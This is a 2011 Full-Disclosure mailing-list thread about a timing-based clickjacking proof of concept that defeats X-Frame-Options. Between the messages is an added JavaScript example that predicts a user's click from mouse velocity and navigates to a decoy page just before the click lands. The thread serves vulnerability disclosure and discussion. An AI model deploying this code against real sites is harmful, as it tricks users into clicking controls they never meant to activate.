Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
> Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities...

Sure thing. Complaining about patches that don't do anything (http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html) is a plus to your reputation, I guess, right? Finding tangible solutions to your problems means that eventually you'll lose the job.

> I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere.

Indeed, you didn't mention Firefox. Someone else did.

> Why?

It's harder to predict how long it would take for a page to load, and your caching concept will fail when the target in question can only be invoked by the user. Also, there's the situation where a simple click won't get you anywhere, for instance in cases where a user has to enter his credentials as well as confirm the action.

Chris.

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
At the risk of annoying everyone... I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously.

The PoC I posted here earlier this week (http://lcamtuf.coredump.cx/switch/) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/).

Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed:

http://lcamtuf.coredump.cx/clickit/

The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible iframe, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site).

While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly.

/mz
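The click-prediction step described in the post above, as an added example that is not code from the clickit PoC or from Michal's post: a pure estimator of how long the pointer will take to reach a visible button, computed from its recent velocity and the remaining distance, plus minimal browser wiring that navigates away just before the predicted click lands. The `bait` element id, the `/decoy.html` destination, the five-sample window and the 150 ms lead time are assumptions made for the example.

```javascript
'use strict';
// Added example, not code from the clickit PoC. Idea from the post: watch the
// pointer, estimate when a deliberate click will land on a visible button, and
// swap the document out just before that moment so the click lands on a
// different page. No frames are involved, so X-Frame-Options never applies.

const WINDOW = 5;     // assumed: how many recent mousemove samples to keep
const LEAD_MS = 150;  // assumed: swap the document this long before the click

// Estimate, from recent pointer samples {x, y, t} (pixels, milliseconds), how
// long until the pointer reaches the centre of `target` ({x, y}).
// Returns null when the pointer is not closing on the target (standing still,
// moving away, or moving sideways relative to it).
function predictArrival(samples, target) {
  if (samples.length < 2) return null;
  const first = samples[0];
  const last = samples[samples.length - 1];
  const dt = last.t - first.t;
  if (dt <= 0) return null;
  // Average pointer velocity over the window, in px/ms.
  const vx = (last.x - first.x) / dt;
  const vy = (last.y - first.y) / dt;
  // Vector from the current pointer position to the target, and its length.
  const dx = target.x - last.x;
  const dy = target.y - last.y;
  const distance = Math.hypot(dx, dy);
  if (distance === 0) return { eta: 0, distance: 0, closingSpeed: Infinity };
  // Component of the velocity along the direction to the target.
  const closingSpeed = (vx * dx + vy * dy) / distance;
  if (closingSpeed <= 0) return null;
  return { eta: distance / closingSpeed, distance, closingSpeed };
}

// Fire the switch when the predicted click is within the lead time.
function shouldSwitch(samples, target, leadMs = LEAD_MS) {
  const p = predictArrival(samples, target);
  return p !== null && p.eta <= leadMs;
}

// Sliding-window bookkeeping for the sample history.
function pushSample(samples, s) {
  samples.push(s);
  if (samples.length > WINDOW) samples.shift();
  return samples;
}

// Browser wiring (skipped outside a browser). The visible button with
// id="bait" is the lure; when the pointer is about to reach it, navigate to
// the decoy page whose real control sits at the same screen position.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const bait = document.getElementById('bait');   // assumed element id
  const samples = [];
  let fired = false;
  document.addEventListener('mousemove', (e) => {
    if (fired || !bait) return;
    const r = bait.getBoundingClientRect();
    const target = { x: r.left + r.width / 2, y: r.top + r.height / 2 };
    pushSample(samples, { x: e.clientX, y: e.clientY, t: e.timeStamp });
    if (shouldSwitch(samples, target)) {
      fired = true;
      window.location.href = '/decoy.html';         // assumed decoy page
    }
  });
}
```

The estimator is kept separate from the DOM so it can be exercised offline with constructed pointer samples; in a browser the `mousemove` handler feeds it `clientX`, `clientY` and `timeStamp`. The attacking page never frames the victim, which is the point of the thread: frame-busting scripts and X-Frame-Options have nothing to act on here.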
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
It's awesome ... and works, but, yes, conditions must be met for Firefox 8 still... this is 2011 ;s almost 12! This is, I guess, a great PoC and info, but only some people realise the potential of this. Anyhow, thanks Mike, that's a GREAT job mate :)

/xd

On 11 December 2011 09:39, Michal Zalewski lcam...@coredump.cx wrote:
> At the risk of annoying everyone... [...]
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
On 10/12/2011 22:39, Michal Zalewski wrote:
> At the risk of annoying everyone... [...]

Looks like I won Michal. Where's my prize?

Clever stuff. This kind of thing has occurred to me as system and indeed network/broadband speed have increased. One time a flashing of a neon on a router or modem or the flash of a window on a desktop gave some indication of data ingress or egress. Nowadays it's done and over with before the user even realises something is afoot.

I had to enable JavaScript though. I guess I trust you not to burn my ass. There are not many links posted on this list which I would click with JavaScript enabled.

Thanks for your insights and the education.

Dave
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
> Interesting stuff indeed. However, I don't see you talk about a solution. Why is that?

Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities...

I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere.

> Anyhow, correct me if I'm wrong, but this concept won't work when the attacked site requires multiple user interactions, right? As in, the user will notice something amiss the second time.

Why?

/mz